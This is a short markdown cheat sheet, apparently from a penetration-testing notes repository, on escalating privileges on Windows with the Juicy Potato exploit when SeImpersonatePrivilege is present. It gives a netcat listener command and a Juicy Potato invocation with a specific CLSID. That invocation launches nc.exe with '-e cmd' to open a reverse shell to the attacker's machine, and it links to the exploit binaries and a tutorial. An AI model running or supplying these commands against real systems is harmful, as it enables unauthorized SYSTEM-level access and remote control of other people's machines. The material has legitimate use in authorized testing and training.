Skip to content

Latest commit

 

History

History
35 lines (20 loc) · 938 Bytes

potato-exploits.md

File metadata and controls

35 lines (20 loc) · 938 Bytes

Potato Exploits

seImpersonatePrivilege (Juicy Potato)

  • If you see this permission, it pretty much makes every version of Windows vulnerable to a Juicy Potato Exploit

whoami /priv:

This exploit requires the usage of Class Identifiers (CLSIDs)

{% embed url="http://ohpe.it/juicy-potato/CLSID/" %}

Once you Identify a proper CLSID, run the following:

  1. Start NC listener on Kali
nc -lnvp 1337

2. Execute juicy potato exploit with working CLSID

Juicy.Potato.x86.exe -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} -t * -l 1337 -p "C:\path\to\nc.exe" -a "<kali_ip_here 1337 -e cmd"

Repo

{% embed url="https://github.com/ohpe/juicy-potato/releases" %}

Tutorial

{% embed url="https://medium.com/r3d-buck3t/impersonating-privileges-with-juicy-potato-e5896b20d505" %}